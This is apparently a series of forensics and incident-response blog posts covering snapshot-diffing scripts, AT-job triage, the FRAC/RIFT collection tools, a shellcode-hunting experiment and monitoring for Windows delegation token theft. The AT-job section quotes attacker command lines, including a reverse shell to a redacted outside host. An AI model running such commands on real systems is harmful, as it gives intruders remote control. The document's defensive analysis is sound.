Turning a Snapshot into a Story: Simple Method to Enhance Live Analysis

System snapshots are a core component of forensic analysis on a live machine. They provide critical insight into what was going on at the moment they were taken, but this is also their limitation: your view is restricted to a single point in time, without context or the opportunity to observe changes as they occur.

Take malware analysis as an example – you’ve executed a malicious process within a virtual machine and run strings against the process memory. This can be exceptionally useful for obtaining information such as IP addresses and configuration data, but what if the sample hasn’t had the chance to contact its C2 server yet? You may not get the information you desire at the precise moment you execute the strings command.



Whilst considering how to expand on the snapshot and monitor system changes in real time, I experimented with several ideas, including developing a system driver and using kernel tracing, all of which were fairly complex. Then it struck me – a snapshot is like a picture, and if you put enough pictures together, one after another, and play them quickly, you end up with a film!

Eight lines of Python later, I had a proof of concept which works pretty well. It was designed to be flexible enough to let the user decide which snapshot tool is to be monitored, and how frequently. On every iteration, it gathers the output from the executed subprocess and compares it against an array of previously observed results. If there is something new that hasn’t been seen before, it displays it to the user along with a timestamp, then adds it to the array to prevent future duplication.
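The eight lines themselves aren’t shown here, but the loop works roughly like this (a minimal Python sketch of the behaviour described above; the function name and parameters are mine, not the original script’s):

```python
import subprocess
import time
from datetime import datetime

def monitor(command, interval=1.0, iterations=None):
    """Run `command` repeatedly, printing any output line not seen before."""
    seen = set()
    count = 0
    while iterations is None or count < iterations:
        result = subprocess.run(command, shell=True,
                                capture_output=True, text=True)
        for line in result.stdout.splitlines():
            if line and line not in seen:
                seen.add(line)
                # New line: show it with the time it first appeared.
                print(datetime.now().strftime("%H:%M:%S"), line)
        count += 1
        time.sleep(interval)
```

Something like `monitor("netstat -an | grep 123")` would reproduce the netstat example discussed later in the post.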




Let’s play through an example. In the image below I have decided to dump the strings from process ID 5284, which is a browser. I am piping the output into grep, as I am only interested in strings that contain the phrase ‘cyberkramer’. When the script starts it will do a first pass against the process memory and store all the results that meet the criteria in an array within the script. A second later, it will re-run the process strings dump – as it has seen the same strings previously, they will not be displayed again. However, if I then type cyberkramer_writes_code into the URL bar, the script will find a new string in memory and display it to me along with the timestamp at which it was found.




Another example that demonstrates the flexibility of the script is to run it against netstat. In this case I am only interested in results that contain “123”. When the script was first run at 12:39:38 I was presented with two lines ending * : *; at this point the script had stored the baseline values. I then loaded a browser and visited a site, and at 12:40:11 the script detected the new line output by netstat during that iteration and presented it to me.



Tools such as Process Monitor can assist with monitoring for operating system changes, but this approach can also be pointed at utilities that traditional behavioural monitoring tools do not cover.

The source code is available from my GitHub repo – please feel free to fork it and alter it to suit your needs.

I would be very interested to hear your feedback and hope this is of some use to you. It can be used against any program which produces results via the command line, and may be especially useful for malware specialists conducting behavioural analysis.

Happy reversing!


Mass Triage Part 3: Processing Returned Files – At Jobs

Our story so far…
Frank, working with Hermes, another security analyst, goes to work to review the tens of thousands of files retrieved by FRAC. They start off by reviewing the returned AT jobs.

AT Job Used by Actors

AT jobs are scheduled tasks created using the at.exe command. AT jobs take the filename format at#.job, where # represents an increasing counter (e.g. at1.job or at42.job). They are used by actors for lateral movement and/or execution of their tools on a machine. AT jobs run as the SYSTEM user, giving the actor the access needed for their tools to run. The jobs can also be scheduled remotely. There are plenty of articles on how AT jobs are used by actors. If you are unfamiliar with how AT jobs are created, see Microsoft’s web site at: https://support.microsoft.com/en-us/help/313565/how-to-use-the-at-command-to-schedule-tasks

I’ll show some example actor AT jobs later in the blog post.

AT Job Analysis

Out of all the files that will get reviewed, AT job analysis takes the least amount of time. Thousands of jobs can be reviewed quickly using frequency analysis, where lines of tool output are sorted, counted, and de-duplicated via the uniq command. Using frequency analysis, an analyst can usually classify the lines with higher frequency counts as normal or legitimate. For example, let’s say that you have 1000 machines and all 1000 machines have the same AT job. Chances are that AT job is legitimate. APT AT jobs are usually found on a smaller set of machines. Let’s get into how to process the AT jobs and some example output.

To process the AT jobs here are the steps:

  1. find . -name "at*job" -print -exec jobparser.py -f {} \; > {output file from step 1}
  2. grep Parameters {output file from step 1} | cut -d: -f 2- | sort | uniq -c | sort -h > {review filename}.txt
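For those who prefer scripting it, the counting that Step 2 performs with grep/cut/sort/uniq can be sketched in Python (a hypothetical helper, not part of the original workflow):

```python
from collections import Counter

def frequency_analysis(lines, key="Parameters:"):
    """Count unique values of the given field, least frequent first,
    mirroring `grep ... | cut -d: -f 2- | sort | uniq -c | sort -h`."""
    counts = Counter(
        line.split(":", 1)[1].strip()
        for line in lines
        if line.startswith(key)
    )
    # Ascending by count, so the rare (and more suspicious) lines come first.
    return sorted(counts.items(), key=lambda kv: kv[1])

sample = [
    "Application: cmd.exe",
    "Parameters: /c start.vbs",
    "Parameters: /c start.vbs",
    "Parameters: /c wde.exe>1.dll",
]
for params, n in frequency_analysis(sample):
    print(n, params)
```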

After running the AT jobs through Jamie Levy’s jobparser.py (https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/jobparser.py), the primary line in the output that needs to be reviewed is the Parameters line. Below is example output from a single AT job from the output file from Step 1:

Product Info: Windows 7
File Version: 1
UUID: {260A6E48-9D8E-46C1-9511-12414604B249}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 1
Status: Task is ready to run
Date Run: Tuesday Oct 20 08:16:00.123 2015
Running Instances: 0
Application: cmd.exe
Parameters: /c start.vbs
Working Directory: Working Directory not set
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Oct 20 08:16:00.0 2015

Note the “Parameters” line. This is the line to key off of when doing a mass file review. While the other data is interesting and useful, the “Parameters” line helps identify which jobs the analyst needs to take a closer look at.

Step 2 Output:

1  /C "C:\xcf\bin\purgeold.bat 30"
1  /C "C:\xcf\bin\CCleanup.bat 4g"
1  /c c:\users\fred\ab.exe>thumbs.dll
1  /c "wde.exe >1.dll"
1  /c wde.exe>1.dll:
1  /c wde.exe>1.dlL
1  /c wde.exe>1.dlL'
1  /c wde.exe>>1.dLL
1  /C "pushd C:\xcf\hist && C:\xcf\bin\purgelog *.hst 7 >hstpurge.log"
1  /c "ght.exe -x>1.dll"
1  /c "ght -x>2.dll"
3  /c "start c:\users\admin\appdata\local\temp\vc connect xxx.xxx.xxx.xxx:80 -e cmd.exe -v"
4  /c system.bat
8  /c "taskkill /f /im wscript.exe"
10  /c wde.exe>1.dll
11  /c start.vbs
200  /C "C:\Program Files\Cisco Systems\CTIOSServer\purgeold.bat 30"

Can you spot the badness? Nearly everything in the list is bad. The only lines that are not bad are the ones ending in “purgeold.bat 30”, “CCleanup.bat 4g”, and “hstpurge.log”. The other jobs listed in the above output are APT related. To briefly explain the columns: the first number represents how many times that line appears in the “{review filename}.txt” file. For example:

11  /c start.vbs

There were 11 AT jobs that ran “/c start.vbs”.

Next Steps

As I go through the Step 2 output file, I typically put an identifier, such as “#km ”, at the end of each line I find interesting so that I can grep my identifier out later. I then trace each interesting line back to its AT job file by searching the output file from Step 1 and reviewing the rest of the AT job details. See the example AT job ./machine13/At2.job from above.

Note that due to the “-print” option given to the find command, the directory path and file name for each AT job are printed before jobparser.py’s output. If FRAC/RIFT was used, the hostname of the machine the AT job came from will be in the directory path. Depending on the contents of the AT job, the machine may require further triage or deeper analysis.

The parsed AT jobs above show the following tools used by the actor:

  • wde.exe
  • ght.exe
  • c:\users\admin\appdata\local\temp\vc
  • system.bat
  • taskkill
  • start.vbs

One of the tasks the analyst needs to do next is track down these tools and review them. Per the list, only one tool had a full path. FRAC could be used to search the entire network for these tools. A custom getfileslist.txt could be written to gather them up. The following are some example lines for the getfileslist.txt file:

  • wde.exe$
  • ght.exe$
  • system.bat$
  • start.vbs$
  • \/users\/admin\/appdata\/local\/temp\/vc*

Note that “taskkill” was not added. The “taskkill” binary is part of the Windows OS, so it doesn’t make sense to pull it back: every system will have it. However, the analyst should work with the administrators to determine if the use of “taskkill” was part of administrator activities.

Lastly, the date run and scheduled date fields for confirmed actor AT jobs should be added to the incident timeline. These dates and times can be used for timeline analysis of the systems where the AT jobs were scheduled. They may also be useful for log analysis and network forensics.

Next in Part 4

In Part 4, I will discuss processing the ShimCache from the SYSTEM hives that were collected using FRAC with regards to mass triage.


Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

Mass Triage: Retrieve Interesting Files Tool (FRAC and RIFT) Part 2

Our story so far…
Frank, a security analyst, reviews the files uploaded by Tony. During the review, Frank notes that AT jobs were used to run malicious tools on Bob’s machine. Some of the AT jobs show unknown batch files being run during the same time frame as the malicious tools. It is possible that the actors have moved laterally within the network. Outside of the AT jobs, the ShimCache shows WinRAR being run, among other things.

Frank decides that he should scan all 15,000 endpoints and servers for signs of the actors. He’ll pull the normal system files for triage and search for the Indicators of Compromise (IOCs) he found on Bob’s laptop. Frank calls management to let them know his next steps and kicks off FRAC.

Many organizations, large and small, struggle with conducting a mass triage during an incident. The two biggest problems they face are:
1) Gathering up the required files
2) Searching for signs of activity

Forensic Response ACquisition (FRAC) and Retrieve Interesting Files Tool (RIFT) were written to address problem 1. FRAC can be configured to sweep across an enterprise and gather up the files required for triage. Once the files have been gathered, another toolset is required to process them (i.e. problem 2). I’ll detail solutions for problem 2 in the next article.

How It Works: FRAC and RIFT

FRAC is a GPLv2 project that can run remote commands across a Windows enterprise network. It consists of a Perl script, basic configuration files, and an SMB share. It uses PAExec or Winexe to connect to the remote machines and then runs the required commands. It doesn’t require a powerful system to run from, but it does require lots of disk space if it has been configured to collect files. FRAC can run on Linux, other *NIX systems, and OS X, using Winexe to connect to the remote Windows machines. As long as you can get Winexe compiled for the operating system, you’re golden. On the Windows side, PAExec was chosen because it is open source and doesn’t produce any pop-ups or other signs that it is running on the remote machine. Because System-level privileges are required to access the $MFT, PSExec, while it does work, displays a pop-up telling the user that it is running. In a triage file-gathering scenario, you don’t want your users killing the processes that are used to gather files or run commands on the remote machine.

FRAC reads in a file containing either IP addresses or a range of IP addresses. It also reads in the cmd.txt file that contains the command that FRAC will execute. Upon reading this data, it will then start contacting remote machines.

FRAC is threaded. By default, FRAC will reach out to 25 machines at a time. Once a machine is finished processing, FRAC will kick off new threads until there are no more IP addresses remaining. In testing, 25 seemed to work better than a greater number. It should be noted that using FRAC to download very large files from multiple machines could impact the network. Think about what is likely to come across the network and set the number of threads to what your network could handle. This is one of those cases where it’s better to test before kicking it off live on the network.
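FRAC itself is a Perl script, but its threading model can be sketched in Python along these lines (illustrative only; run_command is a hypothetical stand-in for the PAExec/Winexe invocation):

```python
from concurrent.futures import ThreadPoolExecutor, as_completed

def run_command(ip, command):
    # Stand-in for the real PAExec/Winexe call against `ip`.
    return (ip, "ok")

def sweep(ips, command, max_threads=25):
    """Contact up to `max_threads` machines at once, picking up new work
    as threads finish; record failures so the scan can be re-kicked."""
    failed = []
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        futures = {pool.submit(run_command, ip, command): ip for ip in ips}
        for future in as_completed(futures):
            try:
                future.result()
            except Exception:
                failed.append(futures[future])
    return failed
```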

To gather files, Retrieve Interesting Files Tool (RIFT) is used as the command that FRAC runs on each remote machine. RIFT requires parts of Sleuthkit and an SMB share to store the retrieved files. When RIFT kicks off on the remote machine, it reads in the regex list of files/directories and then uses Sleuthkit’s fls to start parsing the $MFT. RIFT creates a directory named after the hostname of the machine on the SMB share it was given. Then, as the $MFT is parsed, RIFT uses Sleuthkit’s icat to copy the matching files/directories over to the SMB share, recreating the original directory structure under the hostname directory. For example, if the registry files were copied over, there would be a directory structure that looks like this:

{hostname}/windows/system32/config/{registry hive}

In other words, pulling the SYSTEM hive from a workstation called Workstation13 would look like this:

Workstation13/windows/system32/config/SYSTEM

Once RIFT has completed parsing the $MFT, it ends and returns execution to FRAC. Overall there is very little impact on the machine itself as far as resources such as CPU and memory usage go.
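To make the copy step concrete, here is a rough Python sketch of the matching and path-recreation logic just described (this is not the actual RIFT source; entries are assumed to be already parsed from fls output, and copy_file stands in for the icat call):

```python
import os
import re

def copy_matches(entries, patterns, hostname, dest, copy_file):
    """entries: (inode, path) pairs already parsed from fls output.
    copy_file(inode, target) stands in for the icat invocation.
    Matching paths are recreated under dest/hostname, as RIFT does."""
    regexes = [re.compile(p, re.IGNORECASE) for p in patterns]
    copied = []
    for inode, path in entries:
        # Normalise to a leading slash so getfileslist-style patterns
        # such as \/windows\/system32\/config\/system$ can match.
        if any(r.search("/" + path.lstrip("/")) for r in regexes):
            target = os.path.join(dest, hostname, path.lstrip("/"))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            copy_file(inode, target)
            copied.append(target)
    return copied
```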

RIFT isn’t the only payload: FRAC can run any other command on the remote machines. For example, a batch script can be used to kick off winpmem to capture memory on a remote machine. Beware of doing this type of activity across the board on your network; capturing memory over the network should be done on a case-by-case basis.

FRAC tracks IP addresses that cannot be reached and writes those addresses to a text file. Once FRAC has finished going through the IP addresses, the analyst can re-kick off the scan using the generated text file to retry the IP addresses that failed.

FRAC can be downloaded at:

Be sure to review the documentation on FRAC and RIFT for additional details on how to setup and use the tools.

In Part 3, I will start discussing mass triage and how to process the hundreds of files recovered by FRAC in a meaningful manner that isn’t time consuming. The goal of conducting mass triage is to get answers quickly in the areas of:

  • Which machines were accessed by the actors
  • Which tools and methods were used by the actors
  • Which machines need further analysis
  • Which exfiltration tools, if any, were used

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

Mass Triage: Retrieve Interesting Files Tool (RIFT) Part 1

Our story so far…

Frank, a security analyst, is reviewing network traffic and notes that the VP of Mergers and Acquisitions’ machine has transmitted a 2 GB encrypted RAR file to http://doggydaycareforvps.com. Frank notifies management, and management gets Bob, the VP, to contact Frank regarding the file. Later, Frank learns that Bob did not upload the file, nor has Bob visited the site the file was sent to. Frank requests that Bob drop off his laptop at the company’s satellite site near the hotel he is staying at so that they can pull some files.

Bob drops off his laptop with the desktop support staff at the satellite site, where Tony picks it up and calls Frank to see what needs to be done with the machine. Frank asks him to run the RIFT tool on it and upload the files to the SFTP server after it is finished.

In the course of an incident, incident responders will have to retrieve files from a machine in a forensically sound manner. RIFT copies files from a subject machine in a forensically sound manner using the Sleuthkit toolset. By simply running RIFT with a regex list of file names or directories, specific files and folders are targeted for extraction. For each match, icat is then used to copy the file or folder to a drive/share other than the C drive.

The customizable regex list file, called getfileslist.txt, consists of a list of file names or directories to pull from the machine RIFT is run on. Below is a subset of the file that comes with RIFT:

#Get the system hive
\/windows\/system32\/config\/system$

#Get the software hive
\/windows\/system32\/config\/software$

#Get the contents of the Prefetch directory
\/windows\/prefetch\/

RIFT ignores any lines starting with a # symbol, treating them as comments. The lines containing SYSTEM and SOFTWARE are examples of retrieving a single file. The last example, containing the Prefetch directory, retrieves the entire contents of that directory. The directory structure is recreated on the destination as the files and directories are copied over. Lastly, the output from fls is saved to the destination drive/share.

To run, all the user needs to do is run rift.exe with the savedrive argument as shown in the figure:


RIFT can be downloaded at: https://github.com/chaoticmachinery/fate/tree/master/frac_rift

In Part 2, I’ll discuss using FRAC to pull files network wide for mass triage.

Keven Murphy works for the RSA Incident Response team working on APT to commodity incidents.

DFIR Summit 2016 – Call for Papers Now Open


The 9th annual Digital Forensics and Incident Response Summit will once again be held in the live music capital of the world, Austin, Texas.

The Summit brings together DFIR practitioners who share their experiences, case studies and stories from the field. Summit attendees will explore real-world applications of technologies and solutions from all aspects of the fields of digital forensics and incident response.

Call for Presentations: Now Open
More information 

The 9th Annual Digital Forensics and Incident Response Summit Call for Presentations is now open. If you are interested in presenting or participating on a panel, we’d be delighted to consider your practitioner-based case studies with communicable lessons.

The DFIR Summit offers speakers the opportunity for exposure and recognition as industry leaders. If you have something substantive, challenging, and original to offer, you are encouraged to submit a proposal.

Deadline to submit is December 18th, 2015.

Summit Dates: June 23 & 24, 2016
Post-Summit Training Course Dates: June 25-30, 2016

Submit now 

Detecting Shellcode Hidden in Malicious Files

A challenge both reverse engineers and automated sandboxes have in common is identifying whether a particular file is malicious or not. This is especially true if the malicious aspects are obfuscated and only triggered under very specific circumstances.

There are a number of techniques available to try to identify embedded shellcode, for example searching for patterns (NOP sleds, GetEIP, etc.). However, as attackers update their methods to overcome our protections, it becomes more difficult to find the code without having the exact vulnerable version of the targeted software installed and allowing the exploit to execute successfully.

In this post, I will discuss a new technique I have been experimenting with, which approaches this issue from a different perspective, forcing the execution of the exploit code, no matter what software you have installed. It is based on two core principles:

  1. If you try to execute something that isn’t code (e.g. a text string), the program will likely crash, as the machine code interpretation of this data is unlikely to make much sense.
  2. If you begin executing code from the start (i.e. wherever the instruction pointer would have been set during the exploitation phase), it will run to completion – no matter how obfuscated the instructions are.

So here’s my theory: If we attempt to “execute” the contents of a malicious file (such as a pdf), byte by byte, catching the exceptions as the program continually crashes and then increasing the instruction pointer by one each time, we will eventually come across any malicious code contained therein which will be triggered, run to completion, and provide indicators of its malicious nature through behavioural analysis.

The experiment

In order to test this concept, I wrote a program which does the following:

  • Map the requested file into memory (i.e. make a full copy of it in memory).
  • Set the instruction pointer to the first byte, and allow it to run.
  • It will probably crash! (The instructions won’t make sense!)
  • Catch the error, and use the error handler to increase the instruction pointer by one.
  • Try again, and again, and again…
  • If the file contains shellcode, you will eventually hit it, and it will run – hurrah!
Demonstrating the concept
Step 1 – Generating malicious document and starting metasploit reverse handler

We begin by generating a malicious PDF document containing the reverse_tcp metasploit payload, and starting the handler to await incoming connections. The attacker is now waiting for the victim to open the file with a vulnerable PDF reader, at which point it will connect back to the attacker’s machine.


Step 2 – Dealing with the malicious pdf

Now, let us imagine we are conducting an analysis of this document (either manually, or using an automated sandbox). The issue we are going to have in this case is that we are unlikely to have the vulnerable version of the software installed, the exploit won’t work, and we will be none the wiser that it exists! That isn’t to say the intended victim doesn’t have the vulnerable version installed.

Let us try running the PDF through our proof-of-concept shellcode hunter…


Step 3 – Bingo – shellcode has been located and triggered

As we can see below, the shellcode in the document has been triggered and established a connection back to the metasploit listener! If we were conducting a behavioural analysis, we would be able to identify the suspicious activity and take appropriate action.


Video demo

Check out the video demo if you’d like to see this in action live:


Code sample

If you’re interested in testing the concept, or integrating it into your software (anyone fancy writing a cuckoo module?) – The code I used was pretty simple, and looked like this:


It could definitely be a lot more advanced than the proof of concept I wrote for this demo. For example, if the shellcode started with a JMP $-2 instruction, the search would be trapped in an infinite loop. This could potentially be overcome using multi-threading to continue the search after the first code block has been found.

You may have to play with your compiler settings to get this to work. I set Visual Studio to compile with the ‘Debug’ configuration and switched off some of the protections. If you need some help getting it working, send me a tweet.

I will be presenting this and a few other concepts during a session at SANS London in a couple of weeks, if you’re attending the conference – it would be great to have you along!

Let me know what you think!

Follow me on Twitter: @CyberKramer

Monitoring for Delegation Token Theft

Delegation is a powerful feature of Windows authentication which allows one remote system to effectively forward a user’s credentials to another remote system.  This is sometimes referred to as the “double-hop”.  This great power does not come without great risk, however, as the delegation access tokens used for this purpose can be stolen by attackers and used for lateral movement.  As such, it’s important to be aware of this ability and to increase monitoring for malicious use of delegation.

In order to monitor delegation activity, you need to identify where delegation is occurring.  Then from those in-scope systems where delegation occurs, look for suspicious activity, and potentially identify which users’ accounts were actually delegated.  I’ll take you through these identification steps, but first let’s start with a quick refresher on delegation.  This should give you most of the background you need, although you can get even more details about the delegation process in my article on Safeguarding Access Tokens, including some screenshots showing token theft in action.  There are also some updates on token protection in a more recent article, Restricted Admin and Protected Users.

Delegation Overview

Delegation is a powerful feature that allows a user’s authentication and identity information to be forwarded from one system to another.  The most common use of delegation is to enable multi-tier solutions, such as SharePoint.  With SharePoint, the typical architecture is to have a front-end web server and a back-end database server.  It’s the web server that a user directly interacts with, giving the web-portal view of documents, calendars, lists, etc.  However, the actual data (the documents, calendars, lists, etc.) reside on a back-end database server.  As users directly connect to the front-end web server, the back-end database server also needs to know who the user is so that it can make decisions about which data the user is allowed to access.  With delegation, the user authentication to the front-end server is effectively forwarded, or passed, to the back-end server so that it can have the same user identity information necessary to make access decisions.  Here’s a graphic illustrating this architecture:


A system “Trusted for Delegation” is able to create the “delegate-level” access token that can effectively be forwarded to another system in the domain.  Because of the sensitive nature of delegation, most systems are unable to perform delegation.  In the example above, however, this capability must be granted to the front-end web server so that it can forward the credentials to the back-end database server that holds the data.

Of course the big security risk here is that if attackers compromise the front-end web server, then they can steal delegate-level tokens of connecting users and use them to authenticate as those users to other systems in the domain.  That’s why, from a defensive perspective, it’s important to know where delegation is occurring in your environment in order to increase monitoring for potentially malicious activity.

Locating Delegation Activity

Both computer accounts and user accounts have the ability to be “Trusted for Delegation”.  Fortunately, neither users nor computers (other than domain controllers) are trusted to perform delegation by default because this is a very sensitive (and risky) privilege.  This privilege should only be granted in relatively rare circumstances.  Here’s a look at both the computer account “Delegation” tab and the user account “Delegation” tab (to see the Delegation tab for a user account, that user has to have a Service Principal Name (SPN) registered to it, as described here):



Although delegation should be enabled rarely, for a large organization with thousands of user and computer accounts, rare can still mean dozens of accounts with this ability.  With this in mind, I recently spent some time trying to determine an effective way to sift through thousands of Active Directory accounts, both users and computers, in order to find which are trusted for delegation.  What I found was a PowerShell module that could help determine these settings.  Before showing you the PowerShell command, notice from the “Delegation” screenshots above that there are 3 ways to enable delegation:

  1. Trust the computer/user for delegation to any service (Kerberos only)
  2. Trust the computer/user for delegation to specified services with Kerberos only
  3. Trust the computer/user for delegation to specified services with any authentication protocol

For #1 (trust for delegation to any service, Kerberos only), there is a corresponding Active Directory attribute simply named “TrustedForDelegation”.  For #3 (trust for delegation to specified services with any authentication protocol), there is also a corresponding AD attribute, named “TrustedToAuthForDelegation”.  For #2 (trust for delegation to specified services with Kerberos only), I was unable to find a specific AD attribute.  However, we can get at this by recognizing that in order to be trusted for delegation to a specified service, a Service Principal Name (SPN) must be registered to that account.  That registration is stored in an attribute named “msDS-AllowedToDelegateTo”.  We can use this fact to infer when an account is trusted for delegation to a specified service with Kerberos only (#2).

Using a pair of PowerShell cmdlets from the “Active Directory Module for Windows PowerShell”, we can query the properties of every domain account and return just those that are trusted for delegation.  Here’s what it looks like in the console:


In this screenshot, I have an example of each type of delegation setting:

  1. SVILLE: This computer has setting #1 enabled because the “TrustedForDelegation” attribute is set to TRUE.
  2. SEATTLE: This computer has setting #2 enabled.  This is the one we have to infer.  Since it has an SPN registered to it, but is not “TrustedToAuthForDelegation”, it must be trusted for delegation to specified services with Kerberos only.
  3. DENVER: This computer has setting #3 enabled because the “TrustedToAuthForDelegation” attribute is set to TRUE.  (It also must have a registered SPN since it is for specific services only, thus it will also have one or more entries in the “msDS-AllowedToDelegateTo” attribute.)
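The inference illustrated by SVILLE, SEATTLE, and DENVER can be expressed compactly (a hypothetical helper; the argument names mirror the AD attributes discussed, and the return values match the three settings listed earlier):

```python
def delegation_setting(trusted_for_delegation,
                       trusted_to_auth_for_delegation,
                       allowed_to_delegate_to):
    """Classify an account's delegation setting (1-3), or None."""
    # Setting #3: specified services, any protocol
    if trusted_to_auth_for_delegation:
        return 3
    # Setting #1: any service, Kerberos only
    if trusted_for_delegation:
        return 1
    # Setting #2 (inferred): an SPN target list exists, but neither flag is set
    if allowed_to_delegate_to:
        return 2
    return None
```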

For a large domain, it would be better to output this data to a file so you can manipulate it more easily.  Here’s the command again, but this time output to CSV:

Get-ADComputer -Filter * -Properties Name,Description,msDS-AllowedToDelegateTo,TrustedForDelegation,TrustedToAuthForDelegation | Where-Object {$_.TrustedForDelegation -eq 'True' -or $_.TrustedToAuthForDelegation -eq 'True' -or $_.'msDS-AllowedToDelegateTo' -ne $null} | Select-Object Name,DNSHostName,Description,@{name='msDS-AllowedToDelegateTo';expression={$_.'msDS-AllowedToDelegateTo' -join ";"}},TrustedForDelegation,TrustedToAuthForDelegation | Export-Csv AdComputer-Delegation.csv

Once the results are brought into a spreadsheet and cleaned up a bit, it will look something like this:


The previous command (Get-ADComputer) will check computer accounts in the domain.  A similar command (Get-ADUser) will check user accounts:

Get-ADUser -Filter * -Properties Name,Description,msDS-AllowedToDelegateTo,whenCreated,PasswordLastSet,SamAccountName,ServicePrincipalNames,TrustedForDelegation,TrustedToAuthForDelegation | where {$_.TrustedForDelegation -eq 'True' -or $_.TrustedToAuthForDelegation -eq 'True' -or $_.'msDS-AllowedToDelegateTo' -ne $null} | Select-Object Name,SamAccountName,Description,whenCreated,PasswordLastSet,@{name='ServicePrincipalNames';expression={$_.'ServicePrincipalNames' -join ";"}},@{name='msDS-AllowedToDelegateTo';expression={$_.'msDS-AllowedToDelegateTo' -join ";"}},TrustedForDelegation,TrustedToAuthForDelegation | Export-Csv AdUser-Delegation.csv


With the output from these two commands, you can determine which accounts are trusted for delegation.  This goes most of the way to answering our first question: where can delegation occur?  From the commands above, we have a set of computer accounts that are trusted for delegation, so we’d want to enable enhanced monitoring on those computers.  But what about the user accounts?  Do we have to enhance monitoring on every computer where those accounts are used?  It depends.  For accounts that are trusted to delegate only for specific services, the direct way to answer this is by utilizing the registered SPNs for the user account.

In my example just above, the “Service Account” user is trusted for delegation, but where is that delegation occurring?  It is occurring for sharepoint on seattle, as indicated by the SPN in the msDS-AllowedToDelegateTo attribute.  By definition, the Service Principal Name specifies a named service on a named computer (or computer alias).  As such, we can use this fact to identify where the user is performing delegation.  Back to the example, even if the computer account SEATTLE doesn’t show up as a computer trusted for delegation, we now know that we should increase monitoring on that computer because there is a service account allowed to perform delegation on that machine.
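Mining the msDS-AllowedToDelegateTo SPNs out of the CSV exports above is easy to automate. Here is a minimal Python sketch, assuming the semicolon-joined SPN format produced by the Export-Csv commands earlier (the file path and column name match that output; everything else is illustrative):

```python
import csv

def delegation_targets(csv_path):
    """Extract target hostnames from msDS-AllowedToDelegateTo SPNs.

    SPNs look like 'service/host' or 'service/host:port'; the host part
    identifies computers that should get enhanced monitoring.
    """
    hosts = set()
    with open(csv_path, newline='') as f:
        for row in csv.DictReader(f):
            spns = row.get('msDS-AllowedToDelegateTo', '') or ''
            for spn in spns.split(';'):
                if '/' in spn:
                    # drop the service class, then any :port suffix
                    host = spn.split('/', 1)[1].split(':')[0].lower()
                    hosts.add(host)
    return sorted(hosts)
```

Running this against AdUser-Delegation.csv and AdComputer-Delegation.csv gives a de-duplicated list of hosts to feed into your monitoring scope.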

So that works well for user accounts that are trusted to delegate for specific services.  When user accounts are trusted for delegation to any service, you’ll need to analyze the usage of those accounts to determine when, where, and how they are used.  These accounts are typically used to run services, so look for computers where these users perform Type 5 (service) logons, recorded in Event ID 4624.
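That triage step can be scripted once the 4624 events are exported. The sketch below assumes the events have already been parsed into dicts (for example from a Get-WinEvent export); the field names mirror the 4624 schema but the export format itself is an assumption:

```python
def service_logon_hosts(events, accounts_of_interest):
    """Map each account of interest to the computers where it performs
    Type 5 (service) logons, per Event ID 4624."""
    hits = {}
    for ev in events:
        if ev.get('EventID') == 4624 and ev.get('LogonType') == 5:
            acct = ev.get('TargetUserName', '').lower()
            if acct in accounts_of_interest:
                hits.setdefault(acct, set()).add(ev.get('Computer'))
    return hits
```

The resulting host list tells you where the "delegate to any service" accounts actually run, and therefore where to enhance monitoring.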

Monitoring Delegation in Event Logs

Simply knowing where delegation is occurring is a big piece of the puzzle.  I’d recommend gathering event logs and application logs (such as SharePoint logs and antivirus logs) from relevant computers for both real-time alerting of suspicious activity and historic events for forensic purposes.

As far as determining exactly which accounts were delegated, that really wasn’t possible prior to Windows 8 and Server 2012.  There was no simple way to determine if a delegation token was created for a user when they logged onto a machine.

Fortunately, that has been resolved starting with Windows 8 and Server 2012.  Event ID 4624 now specifies the impersonation type that was created when a user logs on.  This can be important for both proactively assessing the types of accounts that are performing delegation (i.e., are there any highly privileged accounts being delegated?), as well as forensically analyzing accounts that may have been exposed during a compromise.  Here’s a look at the updated 4624 event logs:



What if delegation is occurring on older operating systems, such as Windows Server 2008?  In that case, we cannot determine specifically which accounts were delegated.  However, you can still infer which accounts were delegated based on the fact that the computer performs delegation.  Ideally you would tie application logs to event logs to show that not only did a user of interest logon, but also the user utilized a service that is performing delegation (such as SharePoint).  Even without the application logs though, simply knowing that an account of interest connected to a compromised server that performs delegation can be enough to follow the lead of credential theft and lateral movement.

Finally, we should be on the lookout for suspicious activity that could indicate delegate-level token theft.  Like many things in this field, this can be as much an art as it is a science.  There could be any number of attacker tools that have this capability, so essentially you want to look for unusual activity on the computers performing delegation.  That said, I’m only aware of two openly available tools that perform token theft:  Incognito.exe by Luke Jennings and the incognito module for Metasploit.  For incognito.exe, it runs as a service, so this can be a useful thing to watch out for in event logs, particularly the System event log that records changes to Windows services.  Here’s an example from running incognito.exe on a Windows 8.1 host:


When testing the incognito module for Metasploit, I did not see an incognito service created or anything else to specifically indicate the use of incognito.  However, there were other suspicious event logs that should raise concern in an investigation.  For example, while using Metasploit’s meterpreter payload to run various commands, including the incognito module, the following pseudo-randomly named service and process were created:



By the way, the “Process Command Line” shown above is an added feature to Process Tracking event logs that has been available in Windows 8.1 and Server 2012R2 from the beginning and was just recently made available in Windows 7/8 and Server 2008R2/2012.  This is a very useful feature update.  For more information, see Microsoft Security Advisory 3004375.  Keep in mind though, this would be a security risk for processes run with passwords included in the command line parameters.  This could apply to batch scripts and other administrative tools that might inadvertently record sensitive passwords in the event logs.


Delegation is a very powerful and useful feature, though it comes with an equal amount of risk.  Therefore, it is important to use delegation sparingly, and where it is in use, apply additional monitoring and detection capabilities.  As discussed in this article, you’ll want to scope the systems in your environment that are trusted for delegation and then be on the lookout for suspicious activities from these systems.  As discussed in the previous articles on this topic, also make sure your highly privileged accounts are explicitly disabled for delegation.


Mike Pilkington is a Sr. Information Security Consultant and Incident Responder for a Fortune 500 company in Houston, TX, as well as a SANS instructor teaching FOR408 and FOR508. Find Mike on Twitter @mikepilkington.

Detecting DLL Hijacking on Windows

